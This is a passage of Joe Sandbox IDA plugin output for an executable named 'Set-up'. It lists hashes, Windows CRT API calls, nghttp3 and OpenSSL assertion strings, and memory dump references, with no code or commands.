                                      • Opcode Fuzzy Hash: 0040304b9f84921b93786772093c65ced34c0c76f610628c298672ab3ae28409
                                      • Instruction Fuzzy Hash: 4141F4717082004FD7099E28D890BAABFD6EFC9314F18857DE989CB392D935ED058785
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 005C27D1
                                      Strings
                                      • nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 005C27CC
                                      • nghttp3_qpack.c, xrefs: 005C27C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
                                      • API String ID: 1222420520-645767172
                                      • Opcode ID: 48d11f5e1e155265955c5e487f8c7223fff71b46c8d8a90dc4661f10fb8ab598
                                      • Instruction ID: d1125c05492ad48f18accd6a7c5d200e5e3fdb7e5bff3c54eeb95debf3e11949
                                      • Opcode Fuzzy Hash: 48d11f5e1e155265955c5e487f8c7223fff71b46c8d8a90dc4661f10fb8ab598
                                      • Instruction Fuzzy Hash: 4B51C775A043048FD7049F28D884B6ABBD6FF88314F09467CEC999B392EA34DD45CB91
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 005B468C
                                      Strings
                                      • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 005B4687
                                      • nghttp3_conn.c, xrefs: 005B4682
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                      • API String ID: 1222420520-4133914617
                                      • Opcode ID: 84bcc6f2c53d40da1f3253b298798ea516348f05562a0894cc7f199666e3f4c4
                                      • Instruction ID: a8316fcf0a86546f40b49940715bdde1149419b4217e7f72fab56764fb901b8c
                                      • Opcode Fuzzy Hash: 84bcc6f2c53d40da1f3253b298798ea516348f05562a0894cc7f199666e3f4c4
                                      • Instruction Fuzzy Hash: AF3193716006056FD7209E25EC85EEBBBD8FFC6365F040529F95897242E731E914CBA1
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 005B44B7
                                      Strings
                                      • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 005B44B2
                                      • nghttp3_conn.c, xrefs: 005B44AD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                      • API String ID: 1222420520-4133914617
                                      • Opcode ID: 1623e2a3d8693c014414c859f5610b58901ec8ecedb7bc331785469c04ef7d2a
                                      • Instruction ID: fc0d9ec5fcfd6679f9d2e4db83aa6aa699d3bb10e09eb56cf0c092bfeceed01b
                                      • Opcode Fuzzy Hash: 1623e2a3d8693c014414c859f5610b58901ec8ecedb7bc331785469c04ef7d2a
                                      • Instruction Fuzzy Hash: 4221B072100606AFEB215E65DC45FE77BDAAFC5355F040868FA18C6163EB36E4248B61
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0088A161
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0088A2D1
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0088A3EC
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0088A499
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID:
                                      • API String ID: 3510742995-0
                                      • Opcode ID: cf525fe6afac1eae239d79181103841a7de669cf97ed5479700b5a11f7f0c943
                                      • Instruction ID: 4ea0cf3890bc3b4e0d0a6866fb8a279fdee7c2706c55ac7d84f20afa87660032
                                      • Opcode Fuzzy Hash: cf525fe6afac1eae239d79181103841a7de669cf97ed5479700b5a11f7f0c943
                                      • Instruction Fuzzy Hash: 8AC19F716042109FDB18EF28C888A6A7BE5FF88314F19456EF949CB396D771EC40CB86
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,0058D7A7,?,?,0058D7A7), ref: 005B61CF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: i < len || offset == 0$nghttp3_stream.c
                                      • API String ID: 1222420520-1528673747
                                      • Opcode ID: cfb83cd7ecdf1482ebf8bf2db5c4819406d8792f2e5f913de5a3b441f0ac3e2c
                                      • Instruction ID: 0b488928955fdb7d3d91967bb35a48b8f1e5adaf3f351d1283e4a03d0a466bed
                                      • Opcode Fuzzy Hash: cfb83cd7ecdf1482ebf8bf2db5c4819406d8792f2e5f913de5a3b441f0ac3e2c
                                      • Instruction Fuzzy Hash: 01115B755043048FD304EF29D889FFA7BE8FB88320F0A04BDE94947362DA346985CB91
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,005B88D3,00000010,?,?,00000000,005B9AE3,005BACDD,-00000010,?,?,?,00000000,?), ref: 005B873C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
                                      • API String ID: 1222420520-1502420682
                                      • Opcode ID: f5111d01d1ca7bbf9621ba4c9c0339ed5d76c8261a08f1c7a01a406691522cce
                                      • Instruction ID: ff3ee164220fc6dce7f3ff5f87a8190912147d44bd4ba20a19b273ae585a69fd
                                      • Opcode Fuzzy Hash: f5111d01d1ca7bbf9621ba4c9c0339ed5d76c8261a08f1c7a01a406691522cce
                                      • Instruction Fuzzy Hash: 4711C8796493415FC3119F14DC05BA6BFB5FF86708F1984D9E8489B2A3DA30AC44C751
                                      APIs
                                      • _byteswap_uint64.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFF3F,?,nghttp3_conv.c,0000003D,nghttp3_get_varint,005B5084,?,?), ref: 005B8A31
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _byteswap_uint64
                                      • String ID: nghttp3_conv.c$nghttp3_get_varint
                                      • API String ID: 1624361598-912089391
                                      • Opcode ID: 0ee672e407ada923cd3b8cb99df2856be31c9aa9a357cc8e7702cf98e347dd72
                                      • Instruction ID: d464b5cba61cf158191fc29da8be96fd1dbc19a72f7df543ce992c2d08c99a89
                                      • Opcode Fuzzy Hash: 0ee672e407ada923cd3b8cb99df2856be31c9aa9a357cc8e7702cf98e347dd72
                                      • Instruction Fuzzy Hash: FEF0F6B1550042A7D704AF34D801578BBE2EB82712F8C86E1F495DB1D4CB74C991E711
                                      APIs
                                      • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,\/@), ref: 0053C1E5
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0053C1F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlenstrpbrk
                                      • String ID: \/@
                                      • API String ID: 3089284949-4263999291
                                      • Opcode ID: 004df21259c83799ec1ec27d0c82f5336ef7ad1b93ca1d540161466ab1d76af6
                                      • Instruction ID: c92052460f23c430d51c4a8d365f979910863fd23d131c740bb78a6ea6b3c25d
                                      • Opcode Fuzzy Hash: 004df21259c83799ec1ec27d0c82f5336ef7ad1b93ca1d540161466ab1d76af6
                                      • Instruction Fuzzy Hash: 92E08693A0452125DA2130BCBC01BBF5B55A7C2B71F1D0667F595E2204F52188414392
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,005C0B2D,5308C483,00000000,005B4D9F,?,005B0EC8), ref: 005B0333
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
                                      • API String ID: 1222420520-1879435254
                                      • Opcode ID: 5da0921131bba99eda3d203bf15aea0b47f614c2d1a1057f0ea3d51a187e49e2
                                      • Instruction ID: b35f589fd0e5aa852e7ae39c12185756f685aeab1844d645991bca0b4470558d
                                      • Opcode Fuzzy Hash: 5da0921131bba99eda3d203bf15aea0b47f614c2d1a1057f0ea3d51a187e49e2
                                      • Instruction Fuzzy Hash: 9EE03038200600DFCA149B14D949AA67BE1BF89712F98D5D8F409872E1D731EC01DA00
                                      APIs
                                        • Part of subcall function 006E9F60: GetStdHandle.KERNEL32(000000F4), ref: 006E9F76
                                        • Part of subcall function 006E9F60: GetFileType.KERNEL32(00000000), ref: 006E9F83
                                        • Part of subcall function 006E9F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 006E9FBB
                                      • raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,006ED8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,006EDF70,?,?,?,?,?,?,?,00000000), ref: 006EA18B
                                      • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,006ED8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,006EDF70,?,?,?,?,?,?,?), ref: 006EA195
                                      Strings
                                      • %s:%d: OpenSSL internal error: %s, xrefs: 006EA17C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: File$HandleTypeWrite_exitraise
                                      • String ID: %s:%d: OpenSSL internal error: %s
                                      • API String ID: 2477291680-569889646
                                      • Opcode ID: 9e92bd491b4b5b1db53dbf445835fcef67359cd9d53479178039c936cb3714ca
                                      • Instruction ID: 1085cd69f51706c9e39fa9edda420083ad8c0e5b3a5270bff2ba95b3d4c1b6cc
                                      • Opcode Fuzzy Hash: 9e92bd491b4b5b1db53dbf445835fcef67359cd9d53479178039c936cb3714ca
                                      • Instruction Fuzzy Hash: 28C012B2945346EBEF027E944C03E2AB565BF66700F0C1C1CB254950E7DA639534A657
                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0051F9BB,00000000,00525F07,?,?,0051F9BB,?), ref: 00894266
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0051F9BB,00000000,00525F07,?,?,0051F9BB,?), ref: 0089427A
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0051F9BB,00000000,00525F07,?,?,0051F9BB,?), ref: 00894285
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0051F9BB,00000000,00525F07,?,?,0051F9BB,?), ref: 00894290
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 1c6367711893e6fffc3a0eeba61e92c18efe96a74ad6c62a17d328a124d5e163
                                      • Instruction ID: 17ad85b9995e6f150ed9e69a08e75a08eb7b6be8c9044d4c18ccfd7a48c9e7e8
                                      • Opcode Fuzzy Hash: 1c6367711893e6fffc3a0eeba61e92c18efe96a74ad6c62a17d328a124d5e163
                                      • Instruction Fuzzy Hash: 7601AD76A001018FEE20BB98E841D1BB7D5FF91324B0E8479E449CBA62DA30EC44CF82
                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0086D8A5,?), ref: 0088281B
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00882826
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00882831
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0088283A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
